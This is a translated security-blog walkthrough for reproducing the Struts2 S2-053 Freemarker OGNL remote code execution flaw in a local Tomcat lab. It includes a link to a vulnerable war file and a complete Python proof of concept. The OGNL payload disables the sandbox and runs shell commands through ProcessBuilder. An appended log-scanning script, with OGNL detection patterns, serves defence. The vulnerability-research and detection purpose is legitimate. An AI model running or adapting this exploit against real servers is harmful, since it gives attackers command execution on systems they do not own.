Reproducing the Struts2 Freemarker tags remote code execution vulnerability (S2-053)

Category: Security articles

1. First set up the test environment

First download the XAMPP environment (Tomcat 8, JDK 8).


2. Download the vulnerable war package from this address:

http://oe58q5lw3.bkt.clouddn.com/s/struts2/struts2/s2-053.war


3. Put the war package into Tomcat's webapps directory, then restart Tomcat.


4. Once the environment is up, visit the vulnerable page.

5. Run the PoC with a Python script:

import urllib2
import sys
from urllib import quote


def exploit(url):
    # Send the GET request that carries the OGNL expression and print whatever the server returns
    request = urllib2.Request(url)
    body = ""
    try:
        response = urllib2.urlopen(request)
        body = response.read()
        print body
    except urllib2.HTTPError, e:
        print(str(e))


if __name__ == "__main__":
    url = "http://192.168.3.175:8080/s2-053/"
    param = "name"
    command = "calc"

    payload = "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"

    # URL-encode the payload into the vulnerable "name" parameter of the page
    link = "{}/?{}={}".format(url, param, quote(payload))
    print "[*]Generated EXP: {}".format(link)
    print "\n[*]Exploiting..."
    exploit(link)


6. Finally, look at the server: the familiar calculator window has popped up.
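As an added example that is not part of the original post: a detection-side script that scans Tomcat access-log lines for the OGNL markers that a payload like the one above leaves in the query string (the PoC percent-encodes it with quote(), so the scan decodes first). The log lines are constructed, and the log format is assumed to be Tomcat's common access-log pattern.

```python
import re
from urllib.parse import unquote

# Markers that a legitimate "name" parameter never carries but an injected OGNL
# expression does. Matching runs on the URL-decoded query string because the
# PoC percent-encodes the whole payload with quote().
OGNL_MARKERS = (
    r"%\{",             # OGNL expression opener %{...}
    r"\$\{",            # alternate opener ${...}
    r"#_memberAccess",  # attempt to replace the OGNL member-access sandbox
    r"#context\[",      # access to the xwork ActionContext
    r"@[\w.]+@",        # static member access @some.Class@MEMBER
    r"ProcessBuilder",  # process spawn
)
OGNL_RE = re.compile("|".join(OGNL_MARKERS))

# Tomcat "common" access-log line (assumed format): ip ident user [ts] "req" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def decode_query(path):
    """Decoded query string of a path ('' if none); decoded twice to catch double encoding."""
    if "?" not in path:
        return ""
    return unquote(unquote(path.split("?", 1)[1]))

def ognl_markers_in(path):
    """Sorted list of distinct OGNL markers found in the decoded query of a path."""
    return sorted({m.group(0) for m in OGNL_RE.finditer(decode_query(path))})

def scan_access_log(lines):
    """Return (ip, timestamp, path, markers) for each request that looks like OGNL injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            markers = ognl_markers_in(m.group("path"))
            if markers:
                hits.append((m.group("ip"), m.group("ts"), m.group("path"), markers))
    return hits

# Constructed sample log lines (not taken from a real server)
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Sep/2017:10:01:22 +0800] "GET /s2-053/?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Sep/2017:10:02:03 +0800] "GET /s2-053/?name=%25%7B(%23_memberAccess).(%23p%3Dnew%20java.lang.ProcessBuilder(%27id%27)).(%23p.start())%7D HTTP/1.1" 200 87',
    '10.0.0.9 - - [09/Sep/2017:10:02:40 +0800] "GET /s2-053/?name=%2525%257B(%2523_memberAccess)%257D HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for ip, ts, path, markers in scan_access_log(SAMPLE_LOG):
        print("%s %s suspicious OGNL markers %s in %s" % (ts, ip, markers, path))
```

The second and third sample lines are flagged (the third only because the query is decoded twice), while the benign request is not.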


This article was first published on the WeChat official account (飓风网络安全): Reproducing the Struts2 Freemarker tags remote code execution vulnerability (S2-053)
